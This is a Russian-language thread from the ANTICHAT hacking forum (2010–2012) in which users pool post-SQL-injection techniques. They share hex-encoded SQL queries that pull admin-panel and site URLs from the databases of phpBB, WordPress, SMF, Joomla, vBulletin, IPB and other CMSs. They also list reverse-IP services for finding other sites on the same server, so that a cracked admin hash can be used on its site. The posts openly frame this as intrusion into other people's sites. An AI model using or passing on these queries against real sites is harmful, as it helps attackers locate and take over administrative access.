HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.09.2010, 21:19
HornetBlack
Новичок
Регистрация: 28.10.2007
Сообщений: 11
Провел на форуме:
86145

Репутация: 12
По умолчанию

Занимаясь наполнением своего зверька MWG полезной инфой, столкнулся с темой, которая практически нигде еще не освещалась.

Работая с SQL-инжектами довольно часто натыкаешься на сайты, запущенные под юзером с большими привилегиями, а значит в БД доступны для просмотра десятки табличных схем, относящихся к разным сайтам. После декодирования хэша админа из таблицы какой-нибудь схемы возникает вопрос - как найти админку или хотя бы сайт, к которому относится данная схема? Хотелось бы в этом топике собрать методы поиска путей к таким админкам и сайтам, а также готовые решения для известных форумов и CMS.

Одним из способов найти искомый путь является поиск подсказок в самой БД. Для некоторых форумов и цмс-ок этот метод наиболее прост. Например, для форума phpBB следующий запрос вернет путь к админке:

SELECT group_concat(config_value ORDER BY config_name DESC SEPARATOR 0x2F) FROM phpbb_config WHERE config_name=0x7365727665725F6E616D65 OR config_name=0x7363726970745F70617468

Для Wordpress:

SELECT concat(option_value,0x2F77702D6C6F67696E2E706870) FROM wp_options WHERE option_name LIKE 0x7369746575726C

Для SMF:

SELECT replace(value,0x2F536D696C657973,0x2F696E6465782E7 068703F616374696F6E3D6C6F67696E32) FROM smf_settings WHERE variable=0x736D696C6579735F75726C

А вот у Joomla я обнаружил только абсолютный путь к сайту, который все же иногда помогает найти урл сайта:

SELECT substring_index(substring_index(substr(data,instr( data,0x50617468)),0x22,3),0x22,-1)

Более сложным вариантом нахождения нужных сайтов является прогон строк контента из БД в поисковиках. Есть ли еще идеи?
 
Ответить с цитированием

  #2  
Старый 13.09.2010, 21:27
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

я вот чекаю например осталные сайты через риверс ип

в 90% случаев сайты на одном же серваке

ну и если форум, то через селект просмотриваю например какой нить топик и гуглю.

или не стандартные имена пользователей )

ну и в конце концов имя базы тоже много говорит, конечно же не всегда
 
Ответить с цитированием

  #3  
Старый 13.09.2010, 21:52
HornetBlack
Новичок
Регистрация: 28.10.2007
Сообщений: 11
Провел на форуме:
86145

Репутация: 12
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
я вот чекаю например осталные сайты через риверс ип
в 90% случиев сайты на одном же серваке
ну и если форум, то через селект просмотриваю например какой нить топик, и гуглю этот топик
или не стандартные имена пользователей )
ну и конце концов имя базы тоже много говорит, конечно же не всегда
А чем пользуешься для реверса? domainsdb.net видимо сдох навсегда, а madnet.name очень часто не возвращает ничего.

Насчет гугленья, все перечисленные варианты я тоже использую в ручном режиме, но для автоматизации нужна инфа с подсказками из таблиц в популярных движках. В данный момент у меня есть готовые запросы только для phpList, SMF, Wordpress, phpBB, IPB2, myBB.
 
Ответить с цитированием

  #4  
Старый 13.09.2010, 21:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Это уже очень много, + от меня, если смогу то добавлю )

для реверса юзаю http://ip-whois.net/site_one_ip.php
 
Ответить с цитированием

  #5  
Старый 13.09.2010, 23:10
HornetBlack
Новичок
Регистрация: 28.10.2007
Сообщений: 11
Провел на форуме:
86145

Репутация: 12
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
Это уже очень много, + от меня, если смогу то добавлю )
для реверса юзаю http://ip-whois.net/site_one_ip.php
Спасибо. Если буду находить новые подсказки в базах, буду выкладывать их тут в виде запросов. В данный момент меня очень интересуют Joomla и Mambo, но пока зацепок к ним нет. Даже абсолютный путь выдергивается из jos_session, а она может отсутствовать или не иметь нужной записи...
 
Ответить с цитированием

  #6  
Старый 23.10.2010, 15:58
Светлый
Участник форума
Регистрация: 28.06.2007
Сообщений: 221
Провел на форуме:
836479

Репутация: 135
По умолчанию

Цитата:
Сообщение от HornetBlack  
HornetBlack said:
А чем пользуешься для реверса?
Вот еще пару отличных сервисов

http://spyonweb.com/

http://2ip.ru/domain-list-by-ip/
 
Ответить с цитированием

  #7  
Старый 27.08.2011, 22:56
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Раскрытие путей в БД Gallery (http://gallery.menalto.com/)

SELECT g_location FROM g2_EventLogMap WHERE length(g_location)>0
 
Ответить с цитированием

  #8  
Старый 29.08.2011, 17:06
leaderru
Новичок
Регистрация: 19.05.2010
Сообщений: 5
Провел на форуме:
17789

Репутация: 0
По умолчанию

Еще один классный сайт: http://speed-tester.info/sites_list.php
 
Ответить с цитированием

  #9  
Старый 16.02.2012, 03:58
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

PunBB

Код:
Code:
online → prev_url = [url]
Vbulletin

Код:
Code:
SELECT value FROM setting WHERE varname='site_tab_url'
это от Ereee

phpbb3

Код:
Code:
phpbb_config > config_name = `cookie_domain`, config_value = [url]
IPB

Код:
Code:
ibfconf_settings > conf_key = `home_url`, conf_value = [url]
Datalife Engine

в конфигах не нашел, но можно посмотреть тут:

Код:
Code:
dle_email > name = `reg_mail`, template = [url]
MODx

урла нет, но возможно найдете здесь:

Код:
Code:
modx_system_settings > setting_name = `site_name`, setting_value = [title] or setting_name = `filemanager_path`, setting_value = [home_path]
WebAsyst

Код:
Code:
SC_settings > settings_constant_name = `CONF_SHOP_URL`, settings_value = [url]
NetCat

Код:
Code:
Catalogue > Domain = [url]
 
Ответить с цитированием

  #10  
Старый 16.02.2012, 04:13
SecondLife
Guest
Сообщений: n/a
Провел на форуме:
5997

Репутация: 21
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
phpbb3
Код:
Code:
phpbb_config > config_name = `cookie_domain`, config_value = [url]
Тогда уж server_name. В cookie_domain может находится что угодно, чаще всего - простой слеш.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ